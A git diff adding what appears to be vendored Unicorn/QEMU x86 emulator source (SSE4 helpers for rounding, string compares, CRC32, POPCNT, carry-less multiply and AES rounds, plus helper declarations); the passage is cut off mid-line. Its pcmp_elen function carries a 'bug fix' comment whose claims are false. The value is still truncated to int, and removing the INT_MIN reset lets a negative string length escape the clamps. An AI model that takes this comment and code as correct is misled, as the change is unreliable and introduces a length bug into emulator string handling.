set_float_rounding_mode(float_round_to_zero, &env->sse_status); + break; + } + } + + d->XMM_S(0) = float32_round_to_int(s->XMM_S(0), &env->sse_status); + d->XMM_S(1) = float32_round_to_int(s->XMM_S(1), &env->sse_status); + d->XMM_S(2) = float32_round_to_int(s->XMM_S(2), &env->sse_status); + d->XMM_S(3) = float32_round_to_int(s->XMM_S(3), &env->sse_status); + +#if 0 /* TODO */ + if (mode & (1 << 3)) { + set_float_exception_flags(get_float_exception_flags(&env->sse_status) & + ~float_flag_inexact, + &env->sse_status); + } +#endif + env->sse_status.float_rounding_mode = prev_rounding_mode; +} + +void glue(helper_roundpd, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, + uint32_t mode) +{ + signed char prev_rounding_mode; + + prev_rounding_mode = env->sse_status.float_rounding_mode; + if (!(mode & (1 << 2))) { + switch (mode & 3) { + case 0: + set_float_rounding_mode(float_round_nearest_even, &env->sse_status); + break; + case 1: + set_float_rounding_mode(float_round_down, &env->sse_status); + break; + case 2: + set_float_rounding_mode(float_round_up, &env->sse_status); + break; + case 3: + set_float_rounding_mode(float_round_to_zero, &env->sse_status); + break; + } + } + + d->XMM_D(0) = float64_round_to_int(s->XMM_D(0), &env->sse_status); + d->XMM_D(1) = float64_round_to_int(s->XMM_D(1), &env->sse_status); + +#if 0 /* TODO */ + if (mode & (1 << 3)) { + set_float_exception_flags(get_float_exception_flags(&env->sse_status) & + ~float_flag_inexact, + &env->sse_status); + } +#endif + env->sse_status.float_rounding_mode = prev_rounding_mode; +} + +void glue(helper_roundss, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, + uint32_t mode) +{ + signed char prev_rounding_mode; + + prev_rounding_mode = env->sse_status.float_rounding_mode; + if (!(mode & (1 << 2))) { + switch (mode & 3) { + case 0: + set_float_rounding_mode(float_round_nearest_even, &env->sse_status); + break; + case 1: + set_float_rounding_mode(float_round_down, &env->sse_status); + break; + case 2: + 
set_float_rounding_mode(float_round_up, &env->sse_status); + break; + case 3: + set_float_rounding_mode(float_round_to_zero, &env->sse_status); + break; + } + } + + d->XMM_S(0) = float32_round_to_int(s->XMM_S(0), &env->sse_status); + +#if 0 /* TODO */ + if (mode & (1 << 3)) { + set_float_exception_flags(get_float_exception_flags(&env->sse_status) & + ~float_flag_inexact, + &env->sse_status); + } +#endif + env->sse_status.float_rounding_mode = prev_rounding_mode; +} + +void glue(helper_roundsd, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, + uint32_t mode) +{ + signed char prev_rounding_mode; + + prev_rounding_mode = env->sse_status.float_rounding_mode; + if (!(mode & (1 << 2))) { + switch (mode & 3) { + case 0: + set_float_rounding_mode(float_round_nearest_even, &env->sse_status); + break; + case 1: + set_float_rounding_mode(float_round_down, &env->sse_status); + break; + case 2: + set_float_rounding_mode(float_round_up, &env->sse_status); + break; + case 3: + set_float_rounding_mode(float_round_to_zero, &env->sse_status); + break; + } + } + + d->XMM_D(0) = float64_round_to_int(s->XMM_D(0), &env->sse_status); + +#if 0 /* TODO */ + if (mode & (1 << 3)) { + set_float_exception_flags(get_float_exception_flags(&env->sse_status) & + ~float_flag_inexact, + &env->sse_status); + } +#endif + env->sse_status.float_rounding_mode = prev_rounding_mode; +} + +#define FBLENDP(d, s, m) (m ? 
s : d) +SSE_HELPER_I(helper_blendps, L, 4, FBLENDP) +SSE_HELPER_I(helper_blendpd, Q, 2, FBLENDP) +SSE_HELPER_I(helper_pblendw, W, 8, FBLENDP) + +void glue(helper_dpps, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t mask) +{ + float32 iresult = float32_zero; + + if (mask & (1 << 4)) { + iresult = float32_add(iresult, + float32_mul(d->XMM_S(0), s->XMM_S(0), + &env->sse_status), + &env->sse_status); + } + if (mask & (1 << 5)) { + iresult = float32_add(iresult, + float32_mul(d->XMM_S(1), s->XMM_S(1), + &env->sse_status), + &env->sse_status); + } + if (mask & (1 << 6)) { + iresult = float32_add(iresult, + float32_mul(d->XMM_S(2), s->XMM_S(2), + &env->sse_status), + &env->sse_status); + } + if (mask & (1 << 7)) { + iresult = float32_add(iresult, + float32_mul(d->XMM_S(3), s->XMM_S(3), + &env->sse_status), + &env->sse_status); + } + d->XMM_S(0) = (mask & (1 << 0)) ? iresult : float32_zero; + d->XMM_S(1) = (mask & (1 << 1)) ? iresult : float32_zero; + d->XMM_S(2) = (mask & (1 << 2)) ? iresult : float32_zero; + d->XMM_S(3) = (mask & (1 << 3)) ? iresult : float32_zero; +} + +void glue(helper_dppd, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t mask) +{ + float64 iresult = float64_zero; + + if (mask & (1 << 4)) { + iresult = float64_add(iresult, + float64_mul(d->XMM_D(0), s->XMM_D(0), + &env->sse_status), + &env->sse_status); + } + if (mask & (1 << 5)) { + iresult = float64_add(iresult, + float64_mul(d->XMM_D(1), s->XMM_D(1), + &env->sse_status), + &env->sse_status); + } + d->XMM_D(0) = (mask & (1 << 0)) ? iresult : float64_zero; + d->XMM_D(1) = (mask & (1 << 1)) ? 
iresult : float64_zero;
+}
+
+/* MPSADBW: eight overlapping 4-byte sum-of-absolute-differences,
+ * source block selected by offset bits 0-1, dest start by bit 2. */
+void glue(helper_mpsadbw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s,
+                                  uint32_t offset)
+{
+    int s0 = (offset & 3) << 2;
+    int d0 = (offset & 4) << 0;
+    int i;
+    Reg r;
+
+    for (i = 0; i < 8; i++, d0++) {
+        r.W(i) = 0;
+        r.W(i) += abs1(d->B(d0 + 0) - s->B(s0 + 0));
+        r.W(i) += abs1(d->B(d0 + 1) - s->B(s0 + 1));
+        r.W(i) += abs1(d->B(d0 + 2) - s->B(s0 + 2));
+        r.W(i) += abs1(d->B(d0 + 3) - s->B(s0 + 3));
+    }
+
+    *d = r;
+}
+
+/* SSE4.2 op helpers */
+#define FCMPGTQ(d, s) ((int64_t)d > (int64_t)s ? -1 : 0)
+SSE_HELPER_Q(helper_pcmpgtq, FCMPGTQ)
+
+/* Explicit string length for PCMPESTRx: |reg| clamped to the element
+ * count (8 words or 16 bytes per ctrl bit 0).
+ * Bug fix: the 64-bit (REX.W) path cast the register through (int),
+ * truncating lengths such as 0x1_00000005 down to 5 instead of
+ * clamping them; use (int64_t) as the ISA requires.  Also dropped the
+ * unreachable "val == 0x80000000" reset left over from an unsigned
+ * declaration of val (the > 8 / > 16 clamp always fired first). */
+static inline int pcmp_elen(CPUX86State *env, int reg, uint32_t ctrl)
+{
+    int val;
+
+    /* Presence of REX.W is indicated by a bit higher than 7 set */
+    if (ctrl >> 8) {
+        val = abs1((int64_t)env->regs[reg]);
+    } else {
+        val = abs1((int32_t)env->regs[reg]);
+    }
+
+    if (ctrl & 1) {
+        if (val > 8) {
+            return 8;
+        }
+    } else {
+        if (val > 16) {
+            return 16;
+        }
+    }
+    return val;
+}
+
+/* Implicit string length for PCMPISTRx: index of the first zero
+ * element (NUL terminator), capped at 8 words / 16 bytes. */
+static inline int pcmp_ilen(Reg *r, uint8_t ctrl)
+{
+    int val = 0;
+
+    if (ctrl & 1) {
+        while (val < 8 && r->W(val)) {
+            val++;
+        }
+    } else {
+        while (val < 16 && r->B(val)) {
+            val++;
+        }
+    }
+
+    return val;
+}
+
+/* Fetch element i as unsigned byte/word or signed byte/word,
+ * according to ctrl bits 0-1. */
+static inline int pcmp_val(Reg *r, uint8_t ctrl, int i)
+{
+    switch ((ctrl >> 0) & 3) {
+    case 0:
+        return r->B(i);
+    case 1:
+        return r->W(i);
+    case 2:
+        return (int8_t)r->B(i);
+    case 3:
+    default:
+        return (int16_t)r->W(i);
+    }
+}
+
+/* Shared core of the four PCMPxSTRx instructions: build the
+ * intermediate comparison bitmask and set ZF/SF from the lengths. */
+static inline unsigned pcmpxstrx(CPUX86State *env, Reg *d, Reg *s,
+                                 int8_t ctrl, int valids, int validd)
+{
+    unsigned int res = 0;
+    int v;
+    int j, i;
+    int upper = (ctrl & 1) ? 7 : 15;
+
+    valids--;
+    validd--;
+
+    CC_SRC = (valids < upper ? CC_Z : 0) | (validd < upper ?
CC_S : 0); + + switch ((ctrl >> 2) & 3) { + case 0: + for (j = valids; j >= 0; j--) { + res <<= 1; + v = pcmp_val(s, ctrl, j); + for (i = validd; i >= 0; i--) { + res |= (v == pcmp_val(d, ctrl, i)); + } + } + break; + case 1: + for (j = valids; j >= 0; j--) { + res <<= 1; + v = pcmp_val(s, ctrl, j); + for (i = ((validd - 1) | 1); i >= 0; i -= 2) { + res |= (pcmp_val(d, ctrl, i - 0) >= v && + pcmp_val(d, ctrl, i - 1) <= v); + } + } + break; + case 2: + res = (1 << (upper - MAX(valids, validd))) - 1; + res <<= MAX(valids, validd) - MIN(valids, validd); + for (i = MIN(valids, validd); i >= 0; i--) { + res <<= 1; + v = pcmp_val(s, ctrl, i); + res |= (v == pcmp_val(d, ctrl, i)); + } + break; + case 3: + if (validd == -1) { + res = (2 << upper) - 1; + break; + } + for (j = valids - validd; j >= 0; j--) { + res <<= 1; + v = 1; + for (i = validd; i >= 0; i--) { + v &= (pcmp_val(s, ctrl, i + j) == pcmp_val(d, ctrl, i)); + } + res |= v; + } + break; + } + + switch ((ctrl >> 4) & 3) { + case 1: + res ^= (2 << upper) - 1; + break; + case 3: + res ^= (1 << (valids + 1)) - 1; + break; + } + + if (res) { + CC_SRC |= CC_C; + } + if (res & 1) { + CC_SRC |= CC_O; + } + + return res; +} + +void glue(helper_pcmpestri, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, + uint32_t ctrl) +{ + unsigned int res = pcmpxstrx(env, d, s, ctrl, + pcmp_elen(env, R_EDX, ctrl), + pcmp_elen(env, R_EAX, ctrl)); + + if (res) { + env->regs[R_ECX] = (ctrl & (1 << 6)) ? 31 - clz32(res) : ctz32(res); + } else { + env->regs[R_ECX] = 16 >> (ctrl & (1 << 0)); + } +} + +void glue(helper_pcmpestrm, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, + uint32_t ctrl) +{ + int i; + unsigned int res = pcmpxstrx(env, d, s, ctrl, + pcmp_elen(env, R_EDX, ctrl), + pcmp_elen(env, R_EAX, ctrl)); + + if ((ctrl >> 6) & 1) { + if (ctrl & 1) { + for (i = 0; i < 8; i++, res >>= 1) { + env->xmm_regs[0].W(i) = (res & 1) ? ~0 : 0; + } + } else { + for (i = 0; i < 16; i++, res >>= 1) { + env->xmm_regs[0].B(i) = (res & 1) ? 
~0 : 0; + } + } + } else { + env->xmm_regs[0].Q(1) = 0; + env->xmm_regs[0].Q(0) = res; + } +} + +void glue(helper_pcmpistri, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, + uint32_t ctrl) +{ + unsigned int res = pcmpxstrx(env, d, s, ctrl, + pcmp_ilen(s, ctrl), + pcmp_ilen(d, ctrl)); + + if (res) { + env->regs[R_ECX] = (ctrl & (1 << 6)) ? 31 - clz32(res) : ctz32(res); + } else { + env->regs[R_ECX] = 16 >> (ctrl & (1 << 0)); + } +} + +void glue(helper_pcmpistrm, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, + uint32_t ctrl) +{ + int i; + unsigned int res = pcmpxstrx(env, d, s, ctrl, + pcmp_ilen(s, ctrl), + pcmp_ilen(d, ctrl)); + + if ((ctrl >> 6) & 1) { + if (ctrl & 1) { + for (i = 0; i < 8; i++, res >>= 1) { + env->xmm_regs[0].W(i) = (res & 1) ? ~0 : 0; + } + } else { + for (i = 0; i < 16; i++, res >>= 1) { + env->xmm_regs[0].B(i) = (res & 1) ? ~0 : 0; + } + } + } else { + env->xmm_regs[0].Q(1) = 0; + env->xmm_regs[0].Q(0) = res; + } +} + +#define CRCPOLY 0x1edc6f41 +#define CRCPOLY_BITREV 0x82f63b78 +target_ulong helper_crc32(uint32_t crc1, target_ulong msg, uint32_t len) +{ + target_ulong crc = (msg & ((target_ulong) -1 >> + (TARGET_LONG_BITS - len))) ^ crc1; + + while (len--) { + crc = (crc >> 1) ^ ((crc & 1) ? CRCPOLY_BITREV : 0); + } + + return crc; +} + +#define POPMASK(i) ((target_ulong) -1 / ((1LL << (1 << i)) + 1)) +#define POPCOUNT(n, i) ((n & POPMASK(i)) + ((n >> (1 << i)) & POPMASK(i))) +target_ulong helper_popcnt(CPUX86State *env, target_ulong n, uint32_t type) +{ + CC_SRC = n ? 
0 : CC_Z; + + n = POPCOUNT(n, 0); + n = POPCOUNT(n, 1); + n = POPCOUNT(n, 2); + n = POPCOUNT(n, 3); + if (type == 1) { + return n & 0xff; + } + + n = POPCOUNT(n, 4); +#ifndef TARGET_X86_64 + return n; +#else + if (type == 2) { + return n & 0xff; + } + + return POPCOUNT(n, 5); +#endif +} + +void glue(helper_pclmulqdq, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, + uint32_t ctrl) +{ + uint64_t ah, al, b, resh, resl; + + ah = 0; + al = d->Q((ctrl & 1) != 0); + b = s->Q((ctrl & 16) != 0); + resh = resl = 0; + + while (b) { + if (b & 1) { + resl ^= al; + resh ^= ah; + } + ah = (ah << 1) | (al >> 63); + al <<= 1; + b >>= 1; + } + + d->Q(0) = resl; + d->Q(1) = resh; +} + +void glue(helper_aesdec, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int i; + Reg st = *d; + Reg rk = *s; + + for (i = 0 ; i < 4 ; i++) { + d->L(i) = rk.L(i) ^ bswap32(AES_Td0[st.B(AES_ishifts[4*i+0])] ^ + AES_Td1[st.B(AES_ishifts[4*i+1])] ^ + AES_Td2[st.B(AES_ishifts[4*i+2])] ^ + AES_Td3[st.B(AES_ishifts[4*i+3])]); + } +} + +void glue(helper_aesdeclast, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int i; + Reg st = *d; + Reg rk = *s; + + for (i = 0; i < 16; i++) { + d->B(i) = rk.B(i) ^ (AES_Td4[st.B(AES_ishifts[i])] & 0xff); + } +} + +void glue(helper_aesenc, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int i; + Reg st = *d; + Reg rk = *s; + + for (i = 0 ; i < 4 ; i++) { + d->L(i) = rk.L(i) ^ bswap32(AES_Te0[st.B(AES_shifts[4*i+0])] ^ + AES_Te1[st.B(AES_shifts[4*i+1])] ^ + AES_Te2[st.B(AES_shifts[4*i+2])] ^ + AES_Te3[st.B(AES_shifts[4*i+3])]); + } +} + +void glue(helper_aesenclast, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int i; + Reg st = *d; + Reg rk = *s; + + for (i = 0; i < 16; i++) { + d->B(i) = rk.B(i) ^ (AES_Te4[st.B(AES_shifts[i])] & 0xff); + } + +} + +void glue(helper_aesimc, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int i; + Reg tmp = *s; + + for (i = 0 ; i < 4 ; i++) { + d->L(i) = bswap32(AES_Td0[AES_Te4[tmp.B(4*i+0)] & 0xff] ^ + AES_Td1[AES_Te4[tmp.B(4*i+1)] & 0xff] ^ + 
AES_Td2[AES_Te4[tmp.B(4*i+2)] & 0xff] ^ + AES_Td3[AES_Te4[tmp.B(4*i+3)] & 0xff]); + } +} + +void glue(helper_aeskeygenassist, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, + uint32_t ctrl) +{ + int i; + Reg tmp = *s; + + for (i = 0 ; i < 4 ; i++) { + d->B(i) = AES_Te4[tmp.B(i + 4)] & 0xff; + d->B(i + 8) = AES_Te4[tmp.B(i + 12)] & 0xff; + } + d->L(1) = (d->L(0) << 24 | d->L(0) >> 8) ^ ctrl; + d->L(3) = (d->L(2) << 24 | d->L(2) >> 8) ^ ctrl; +} +#endif + +#undef SHIFT +#undef XMM_ONLY +#undef Reg +#undef B +#undef W +#undef L +#undef Q +#undef SUFFIX diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/ops_sse_header.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/ops_sse_header.h new file mode 100644 index 0000000..a68c7cc --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/ops_sse_header.h @@ -0,0 +1,360 @@ +/* + * MMX/3DNow!/SSE/SSE2/SSE3/SSSE3/SSE4/PNI support + * + * Copyright (c) 2005 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/>. 
+ */ +#if SHIFT == 0 +#define Reg MMXReg +#define SUFFIX _mmx +#else +#define Reg XMMReg +#define SUFFIX _xmm +#endif + +#define dh_alias_Reg ptr +#define dh_alias_XMMReg ptr +#define dh_alias_MMXReg ptr +#define dh_ctype_Reg Reg * +#define dh_ctype_XMMReg XMMReg * +#define dh_ctype_MMXReg MMXReg * +#define dh_is_signed_Reg dh_is_signed_ptr +#define dh_is_signed_XMMReg dh_is_signed_ptr +#define dh_is_signed_MMXReg dh_is_signed_ptr + +DEF_HELPER_3(glue(psrlw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(psraw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(psllw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(psrld, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(psrad, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pslld, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(psrlq, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(psllq, SUFFIX), void, env, Reg, Reg) + +#if SHIFT == 1 +DEF_HELPER_3(glue(psrldq, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pslldq, SUFFIX), void, env, Reg, Reg) +#endif + +#define SSE_HELPER_B(name, F)\ + DEF_HELPER_3(glue(name, SUFFIX), void, env, Reg, Reg) + +#define SSE_HELPER_W(name, F)\ + DEF_HELPER_3(glue(name, SUFFIX), void, env, Reg, Reg) + +#define SSE_HELPER_L(name, F)\ + DEF_HELPER_3(glue(name, SUFFIX), void, env, Reg, Reg) + +#define SSE_HELPER_Q(name, F)\ + DEF_HELPER_3(glue(name, SUFFIX), void, env, Reg, Reg) + +SSE_HELPER_B(paddb, FADD) +SSE_HELPER_W(paddw, FADD) +SSE_HELPER_L(paddl, FADD) +SSE_HELPER_Q(paddq, FADD) + +SSE_HELPER_B(psubb, FSUB) +SSE_HELPER_W(psubw, FSUB) +SSE_HELPER_L(psubl, FSUB) +SSE_HELPER_Q(psubq, FSUB) + +SSE_HELPER_B(paddusb, FADDUB) +SSE_HELPER_B(paddsb, FADDSB) +SSE_HELPER_B(psubusb, FSUBUB) +SSE_HELPER_B(psubsb, FSUBSB) + +SSE_HELPER_W(paddusw, FADDUW) +SSE_HELPER_W(paddsw, FADDSW) +SSE_HELPER_W(psubusw, FSUBUW) +SSE_HELPER_W(psubsw, FSUBSW) + +SSE_HELPER_B(pminub, FMINUB) +SSE_HELPER_B(pmaxub, FMAXUB) + +SSE_HELPER_W(pminsw, FMINSW) +SSE_HELPER_W(pmaxsw, FMAXSW) + +SSE_HELPER_Q(pand, 
FAND) +SSE_HELPER_Q(pandn, FANDN) +SSE_HELPER_Q(por, FOR) +SSE_HELPER_Q(pxor, FXOR) + +SSE_HELPER_B(pcmpgtb, FCMPGTB) +SSE_HELPER_W(pcmpgtw, FCMPGTW) +SSE_HELPER_L(pcmpgtl, FCMPGTL) + +SSE_HELPER_B(pcmpeqb, FCMPEQ) +SSE_HELPER_W(pcmpeqw, FCMPEQ) +SSE_HELPER_L(pcmpeql, FCMPEQ) + +SSE_HELPER_W(pmullw, FMULLW) +#if SHIFT == 0 +SSE_HELPER_W(pmulhrw, FMULHRW) +#endif +SSE_HELPER_W(pmulhuw, FMULHUW) +SSE_HELPER_W(pmulhw, FMULHW) + +SSE_HELPER_B(pavgb, FAVG) +SSE_HELPER_W(pavgw, FAVG) + +DEF_HELPER_3(glue(pmuludq, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmaddwd, SUFFIX), void, env, Reg, Reg) + +DEF_HELPER_3(glue(psadbw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_4(glue(maskmov, SUFFIX), void, env, Reg, Reg, tl) +DEF_HELPER_2(glue(movl_mm_T0, SUFFIX), void, Reg, i32) +#ifdef TARGET_X86_64 +DEF_HELPER_2(glue(movq_mm_T0, SUFFIX), void, Reg, i64) +#endif + +#if SHIFT == 0 +DEF_HELPER_3(glue(pshufw, SUFFIX), void, Reg, Reg, int) +#else +DEF_HELPER_3(shufps, void, Reg, Reg, int) +DEF_HELPER_3(shufpd, void, Reg, Reg, int) +DEF_HELPER_3(glue(pshufd, SUFFIX), void, Reg, Reg, int) +DEF_HELPER_3(glue(pshuflw, SUFFIX), void, Reg, Reg, int) +DEF_HELPER_3(glue(pshufhw, SUFFIX), void, Reg, Reg, int) +#endif + +#if SHIFT == 1 +/* FPU ops */ +/* XXX: not accurate */ + +#define SSE_HELPER_S(name, F) \ + DEF_HELPER_3(name ## ps, void, env, Reg, Reg) \ + DEF_HELPER_3(name ## ss, void, env, Reg, Reg) \ + DEF_HELPER_3(name ## pd, void, env, Reg, Reg) \ + DEF_HELPER_3(name ## sd, void, env, Reg, Reg) + +SSE_HELPER_S(add, FPU_ADD) +SSE_HELPER_S(sub, FPU_SUB) +SSE_HELPER_S(mul, FPU_MUL) +SSE_HELPER_S(div, FPU_DIV) +SSE_HELPER_S(min, FPU_MIN) +SSE_HELPER_S(max, FPU_MAX) +SSE_HELPER_S(sqrt, FPU_SQRT) + + +DEF_HELPER_3(cvtps2pd, void, env, Reg, Reg) +DEF_HELPER_3(cvtpd2ps, void, env, Reg, Reg) +DEF_HELPER_3(cvtss2sd, void, env, Reg, Reg) +DEF_HELPER_3(cvtsd2ss, void, env, Reg, Reg) +DEF_HELPER_3(cvtdq2ps, void, env, Reg, Reg) +DEF_HELPER_3(cvtdq2pd, void, env, Reg, Reg) 
+DEF_HELPER_3(cvtpi2ps, void, env, XMMReg, MMXReg) +DEF_HELPER_3(cvtpi2pd, void, env, XMMReg, MMXReg) +DEF_HELPER_3(cvtsi2ss, void, env, XMMReg, i32) +DEF_HELPER_3(cvtsi2sd, void, env, XMMReg, i32) + +#ifdef TARGET_X86_64 +DEF_HELPER_3(cvtsq2ss, void, env, XMMReg, i64) +DEF_HELPER_3(cvtsq2sd, void, env, XMMReg, i64) +#endif + +DEF_HELPER_3(cvtps2dq, void, env, XMMReg, XMMReg) +DEF_HELPER_3(cvtpd2dq, void, env, XMMReg, XMMReg) +DEF_HELPER_3(cvtps2pi, void, env, MMXReg, XMMReg) +DEF_HELPER_3(cvtpd2pi, void, env, MMXReg, XMMReg) +DEF_HELPER_2(cvtss2si, s32, env, XMMReg) +DEF_HELPER_2(cvtsd2si, s32, env, XMMReg) +#ifdef TARGET_X86_64 +DEF_HELPER_2(cvtss2sq, s64, env, XMMReg) +DEF_HELPER_2(cvtsd2sq, s64, env, XMMReg) +#endif + +DEF_HELPER_3(cvttps2dq, void, env, XMMReg, XMMReg) +DEF_HELPER_3(cvttpd2dq, void, env, XMMReg, XMMReg) +DEF_HELPER_3(cvttps2pi, void, env, MMXReg, XMMReg) +DEF_HELPER_3(cvttpd2pi, void, env, MMXReg, XMMReg) +DEF_HELPER_2(cvttss2si, s32, env, XMMReg) +DEF_HELPER_2(cvttsd2si, s32, env, XMMReg) +#ifdef TARGET_X86_64 +DEF_HELPER_2(cvttss2sq, s64, env, XMMReg) +DEF_HELPER_2(cvttsd2sq, s64, env, XMMReg) +#endif + +DEF_HELPER_3(rsqrtps, void, env, XMMReg, XMMReg) +DEF_HELPER_3(rsqrtss, void, env, XMMReg, XMMReg) +DEF_HELPER_3(rcpps, void, env, XMMReg, XMMReg) +DEF_HELPER_3(rcpss, void, env, XMMReg, XMMReg) +DEF_HELPER_3(extrq_r, void, env, XMMReg, XMMReg) +DEF_HELPER_4(extrq_i, void, env, XMMReg, int, int) +DEF_HELPER_3(insertq_r, void, env, XMMReg, XMMReg) +DEF_HELPER_4(insertq_i, void, env, XMMReg, int, int) +DEF_HELPER_3(haddps, void, env, XMMReg, XMMReg) +DEF_HELPER_3(haddpd, void, env, XMMReg, XMMReg) +DEF_HELPER_3(hsubps, void, env, XMMReg, XMMReg) +DEF_HELPER_3(hsubpd, void, env, XMMReg, XMMReg) +DEF_HELPER_3(addsubps, void, env, XMMReg, XMMReg) +DEF_HELPER_3(addsubpd, void, env, XMMReg, XMMReg) + +#define SSE_HELPER_CMP(name, F) \ + DEF_HELPER_3(name ## ps, void, env, Reg, Reg) \ + DEF_HELPER_3(name ## ss, void, env, Reg, Reg) \ + 
DEF_HELPER_3(name ## pd, void, env, Reg, Reg) \ + DEF_HELPER_3(name ## sd, void, env, Reg, Reg) + +SSE_HELPER_CMP(cmpeq, FPU_CMPEQ) +SSE_HELPER_CMP(cmplt, FPU_CMPLT) +SSE_HELPER_CMP(cmple, FPU_CMPLE) +SSE_HELPER_CMP(cmpunord, FPU_CMPUNORD) +SSE_HELPER_CMP(cmpneq, FPU_CMPNEQ) +SSE_HELPER_CMP(cmpnlt, FPU_CMPNLT) +SSE_HELPER_CMP(cmpnle, FPU_CMPNLE) +SSE_HELPER_CMP(cmpord, FPU_CMPORD) + +DEF_HELPER_3(ucomiss, void, env, Reg, Reg) +DEF_HELPER_3(comiss, void, env, Reg, Reg) +DEF_HELPER_3(ucomisd, void, env, Reg, Reg) +DEF_HELPER_3(comisd, void, env, Reg, Reg) +DEF_HELPER_2(movmskps, i32, env, Reg) +DEF_HELPER_2(movmskpd, i32, env, Reg) +#endif + +DEF_HELPER_2(glue(pmovmskb, SUFFIX), i32, env, Reg) +DEF_HELPER_3(glue(packsswb, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(packuswb, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(packssdw, SUFFIX), void, env, Reg, Reg) +#define UNPCK_OP(base_name, base) \ + DEF_HELPER_3(glue(punpck ## base_name ## bw, SUFFIX), void, env, Reg, Reg) \ + DEF_HELPER_3(glue(punpck ## base_name ## wd, SUFFIX), void, env, Reg, Reg) \ + DEF_HELPER_3(glue(punpck ## base_name ## dq, SUFFIX), void, env, Reg, Reg) + +UNPCK_OP(l, 0) +UNPCK_OP(h, 1) + +#if SHIFT == 1 +DEF_HELPER_3(glue(punpcklqdq, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(punpckhqdq, SUFFIX), void, env, Reg, Reg) +#endif + +/* 3DNow! 
float ops */ +#if SHIFT == 0 +DEF_HELPER_3(pi2fd, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pi2fw, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pf2id, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pf2iw, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pfacc, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pfadd, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pfcmpeq, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pfcmpge, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pfcmpgt, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pfmax, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pfmin, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pfmul, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pfnacc, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pfpnacc, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pfrcp, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pfrsqrt, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pfsub, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pfsubr, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pswapd, void, env, MMXReg, MMXReg) +#endif + +/* SSSE3 op helpers */ +DEF_HELPER_3(glue(phaddw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(phaddd, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(phaddsw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(phsubw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(phsubd, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(phsubsw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pabsb, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pabsw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pabsd, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmaddubsw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmulhrsw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pshufb, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(psignb, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(psignw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(psignd, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_4(glue(palignr, SUFFIX), void, env, Reg, Reg, s32) + +/* SSE4.1 op helpers */ +#if SHIFT == 1 +DEF_HELPER_3(glue(pblendvb, SUFFIX), void, 
